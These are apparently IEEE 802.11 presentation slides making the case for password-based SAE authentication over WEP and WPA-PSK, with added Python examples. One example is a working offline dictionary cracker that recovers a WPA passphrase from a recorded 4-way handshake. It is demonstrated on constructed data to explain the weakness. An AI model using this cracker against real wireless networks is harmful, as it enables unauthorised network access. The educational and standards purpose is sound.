Secure 802.11 Authentication Using Only A Password
Authors: Dan Harkins, Aruba Networks
Date: 2009-01-19
Abstract
Authentication using a password or pre-shared key has not been done properly in 802.11. As a result, there is currently no way to use these credentials to secure a WLAN.
Password Authentication
• Passwords are the pre-eminent credential used for network access today.
  • The concept is simple to grasp for unsophisticated users.
  • They are easy to configure and easy to manage.
• They therefore tend to be:
  • Something easy to remember.
  • Something that can be entered repeatedly with a low probability of error.
  • Weak, and problematic if not used properly.
• Passwords are used today and will continue to be used tomorrow.
Problems with Passwords in 802.11
• Shared key authentication (WEP)
  • Uses a statically configured key in a challenge/response authentication protocol.
  • Uses 802.11 authentication frames: if you can’t get authenticated you can’t associate.
  • Fundamentally flawed: the cleartext challenge and its encrypted response hand an eavesdropper the keystream. Broken in a matter of seconds.
• (WPA) PSK authentication
  • Hashes the password with the SSID (PBKDF2, 4096 iterations) to create a key, the PMK, used in a cryptographic handshake for authentication.
  • Uses data frames: first you do open authentication, then association, and then you exchange the handshake as data frames.
  • Susceptible to a passive guessing attack: anyone who records one handshake can test password guesses offline. Broken in a matter of minutes to a matter of hours depending on how “strong” the password is.
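The passive guessing attack against (WPA) PSK, worked through as an added example that is not from the slides: the script plays both sides of a 4-way handshake so it runs offline, then recovers the passphrase from the recorded material and a small wordlist. The PMK, PTK and MIC derivations are the IEEE 802.11i ones; the SSID, MAC addresses, nonces, passphrase, wordlist and the zero-filled EAPOL-Key body are all constructed for this example.

```python
import hashlib
import hmac

# Added example, not from the slides: why (WPA) PSK is "susceptible to a passive
# guessing attack". A sniffer needs only the two MAC addresses, the two nonces and
# the MIC on one EAPOL-Key frame of the 4-way handshake; the password is the only
# unknown, so every guess can be checked offline. PMK/PTK/MIC derivation follows
# IEEE 802.11i; the EAPOL-Key body below is a zero-filled stand-in, and the
# addresses, nonces, passphrase and wordlist are constructed for the example.

def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from PMK, the sorted MAC addresses and the sorted nonces; KCK is PTK[0:16]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck: bytes, frame_with_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[0:16]."""
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]

def handshake_mic(passphrase: str, cap: dict) -> bytes:
    """The MIC a client holding `passphrase` would put on the captured frame."""
    ptk = wpa_ptk(wpa_pmk(passphrase, cap["ssid"]), cap["aa"], cap["spa"], cap["anonce"], cap["snonce"])
    return eapol_mic(ptk[:16], cap["frame"])

def crack_psk(cap: dict, wordlist):
    """Offline dictionary attack: re-derive the MIC per guess; no traffic to the AP is needed."""
    for guess in wordlist:
        if hmac.compare_digest(handshake_mic(guess, cap), cap["mic"]):
            return guess
    return None

# Constructed stand-in for what a passive sniffer records during one handshake.
SSID = "corpnet"
AA = bytes.fromhex("001122334455")     # authenticator (AP) address
SPA = bytes.fromhex("66778899aabb")    # supplicant (client) address
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
FRAME = b"\x02\x03\x00\x75" + b"\x02\x01\x0a" + b"\x00" * 114   # EAPOL-Key body, MIC field zeroed

def make_capture(real_passphrase: str) -> dict:
    """Build the 'capture' by playing the legitimate client: everything but the passphrase is public."""
    cap = {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE, "frame": FRAME}
    cap["mic"] = handshake_mic(real_passphrase, cap)
    return cap

if __name__ == "__main__":
    print(crack_psk(make_capture("sunshine1"), ["password", "letmein", "sunshine1", "welcome"]))
```

The only cost per guess is one PBKDF2 run of 4096 SHA1 iterations plus a few HMACs, and nothing in the attack touches the network after the one recorded handshake, which is what makes the time-to-break a function of password strength alone.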
Problems with Passwords in 802.11
• These issues cause continued bad press for 802.11. A simple search turns up:
  • “Unsafe at any key length”
  • “Wireless security’s broken skeleton in the closet”
  • “Networks suffer from wireless insecurity”
  • “Wireless connectivity can breed wireless insecurity”
• The ease of use of passwords means they will continue to be used.
• There is no way to securely use them in the standard today!
Secure Password-based Authentication
• TGs (the 802.11s mesh task group) has a peer-to-peer protocol for using a password to authenticate mesh points.
  • While designed for mesh, it is suitable for STA-to-AP communication, IBSS, and any other peer-to-peer application.
• Uses 802.11 authentication frames in a cryptographically secure protocol, and the key it produces can protect subsequent exchanges.
• Provides security against passive attack, active attack, and dictionary attack.
  • Resistance to attack obviates the password management rules that make passwords harder to use: passwords can be “weaker” and can be shared and still not be susceptible to attack.
• It fits nicely into the 802.11 state machine: authentication using authentication frames!
Secure Password-based Authentication
• Each side sends two messages: a commitment (to a guess of the password) and a confirmation (of knowledge of the password).
• Uses a “zero knowledge proof”.
  • The only information leaked by the exchange is whether you know the password or not.
  • Unlike (WPA) PSK, an attacker cannot learn anything about the password by passively watching the exchange.
  • An attacker gets one guess and one guess only per active attack. Countermeasures deal with repeated active attacks.
• I have a proposal to add this to the base document but it needs vetting.
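The commit/confirm exchange described on the last two slides, as an added example that is not code from the slides or from the 802.11s draft. It follows the shape of Harkins' SAE over a finite field: a password element PE is derived from the password and both peers' addresses, each side commits with a scalar and a PE blinded by a fresh random mask, both derive the same K, and each proves knowledge of the password with an HMAC over the transcript. Everything below the protocol shape is an assumption of this example: a toy 64-bit safe-prime group generated at start-up (real deployments use a 2048-bit or larger standard MODP group or an elliptic curve), SHA-256 throughout, a simplified KDF and message layout, and constructed MAC addresses and passwords.

```python
import hashlib
import hmac
import secrets

# Added example, not code from the slides or the 802.11s draft: the commit/confirm
# exchange described above, over a finite field in the shape of Harkins' SAE.
# Assumed for this example: a toy 64-bit safe-prime group generated below (real
# deployments use a 2048-bit+ MODP group or an elliptic curve), SHA-256 throughout,
# and a simplified KDF and message layout.

SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]

def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with the first 12 prime bases: deterministic for n < 3.18e23."""
    if n < 2 or any(n % sp == 0 for sp in SMALL_PRIMES):
        return n in SMALL_PRIMES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in SMALL_PRIMES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def toy_safe_prime(bits: int = 64):
    """Smallest safe prime p = 2q + 1 with q a `bits`-bit prime; q is the group order."""
    q = (1 << (bits - 1)) | 1
    while not (is_probable_prime(q) and is_probable_prime(2 * q + 1)):
        q += 2
    return 2 * q + 1, q

P, Q = toy_safe_prime()

def enc(x: int) -> bytes:                      # fixed-width encoding of scalars and elements
    return x.to_bytes((P.bit_length() + 7) // 8, "big")

def password_element(password: bytes, mac_a: bytes, mac_b: bytes) -> int:
    """"Hunting and pecking": hash password, peer addresses and a counter into the
    order-q subgroup; retry with the next counter if the result is the identity."""
    addrs = max(mac_a, mac_b) + min(mac_a, mac_b)
    for counter in range(1, 256):
        seed = hashlib.sha256(addrs + password + bytes([counter])).digest()
        base = int.from_bytes(seed, "big") % (P - 2) + 2
        pe = pow(base, (P - 1) // Q, P)
        if pe != 1:
            return pe
    raise ValueError("could not derive a password element")

class SaePeer:
    def __init__(self, mac: bytes, peer_mac: bytes, password: bytes):
        self.pe = password_element(password, mac, peer_mac)
        while True:                            # SAE needs 1 < rand, mask, scalar < q
            self.rand, mask = secrets.randbelow(Q - 2) + 2, secrets.randbelow(Q - 2) + 2
            self.scalar = (self.rand + mask) % Q
            if self.scalar > 1:
                break
        self.element = pow(pow(self.pe, mask, P), -1, P)   # PE^(-mask): PE blinded by a fresh mask

    def receive_commit(self, peer_scalar: int, peer_element: int) -> None:
        if not 1 < peer_scalar < Q or not 1 < peer_element < P or pow(peer_element, Q, P) != 1:
            raise ValueError("rejected commit: scalar or element out of range")
        # K = (PE^peer_scalar * peer_element)^rand = PE^(rand * peer_rand), equal on both sides
        k = pow(pow(self.pe, peer_scalar, P) * peer_element % P, self.rand, P)
        if k == 1:
            raise ValueError("rejected commit: degenerate shared secret")
        keyseed = hashlib.sha256(enc(k)).digest()
        kdf = hmac.new(keyseed, b"SAE KCK and PMK" + enc((self.scalar + peer_scalar) % Q),
                       hashlib.sha512).digest()
        self.kck, self.pmk = kdf[:32], kdf[32:]
        self.peer_scalar, self.peer_element = peer_scalar, peer_element

    def _confirm_mac(self, send_confirm: int, s1: int, e1: int, s2: int, e2: int) -> bytes:
        msg = send_confirm.to_bytes(2, "big") + enc(s1) + enc(e1) + enc(s2) + enc(e2)
        return hmac.new(self.kck, msg, hashlib.sha256).digest()
    def confirm(self, send_confirm: int = 1) -> bytes:
        return self._confirm_mac(send_confirm, self.scalar, self.element, self.peer_scalar, self.peer_element)
    def verify(self, peer_confirm: bytes, send_confirm: int = 1) -> bool:
        expected = self._confirm_mac(send_confirm, self.peer_scalar, self.peer_element, self.scalar, self.element)
        return hmac.compare_digest(expected, peer_confirm)

MAC_A, MAC_B = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")   # constructed

def run_exchange(password_a: bytes, password_b: bytes):
    """Commit then confirm between two peers; returns (both confirms verified, PMKs equal)."""
    a, b = SaePeer(MAC_A, MAC_B, password_a), SaePeer(MAC_B, MAC_A, password_b)
    a.receive_commit(b.scalar, b.element)
    b.receive_commit(a.scalar, a.element)
    return a.verify(b.confirm()) and b.verify(a.confirm()), a.pmk == b.pmk

if __name__ == "__main__":
    print(run_exchange(b"correct horse", b"correct horse"), run_exchange(b"correct horse", b"wrong guess"))
```

Two things the run makes concrete. A passive observer sees only scalars, blinded elements and HMACs: with a fresh random mask per run, checking a password guess against the transcript means recovering the mask from PE^(-mask), a discrete logarithm in the group, so there is no offline dictionary attack to mount. An active attacker who substitutes a guessed password gets exactly the second result, a failed confirm and nothing else, and must start a new exchange for the next guess, which is what the slide's per-attempt countermeasures then throttle.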
Straw Poll
• “A secure password-based authentication protocol should become part of the base 802.11 standard.”
  Yes: No: Don’t know:
References
• D. Harkins, “Simultaneous Authentication of Equals: A Secure, Password-Based Key Exchange for Mesh Networks,” Proceedings of the 2008 Second International Conference on Sensor Technologies and Applications (SENSORCOMM 2008), pp. 839-844, 2008.